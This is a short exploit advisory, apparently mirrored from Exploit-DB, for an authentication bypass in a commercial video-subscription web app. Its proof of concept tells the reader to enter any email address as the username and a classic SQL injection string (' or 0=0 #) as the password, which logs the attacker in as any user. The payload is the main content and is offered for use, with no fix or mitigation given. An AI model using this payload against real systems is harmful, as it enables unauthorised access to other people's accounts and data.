TV – Video Subscription – Authentication Bypass SQL Injection

  • 作者: L0RD
    日期: 2018-02-16
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44100/
  • # Exploit Title: TV - Video Subscription - Authentication Bypass
    # Dork: N/A
    # Date: 2018-02-14
    # Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
    # Vendor Homepage: https://codecanyon.net/item/tv-video-subscription/13966427?s_rank=1677
    # Version: All version
    # Category: Webapps
    # CVE: N/A
    # # # # #
    # Description:
    # With this exploit,attacker can login as any user without any
    authentication.
    # # # # #
    # Proof of Concept :
    
    1) Go to login page .
    
    2) Username : anything@anything.anything
    Password : ' or 0=0 #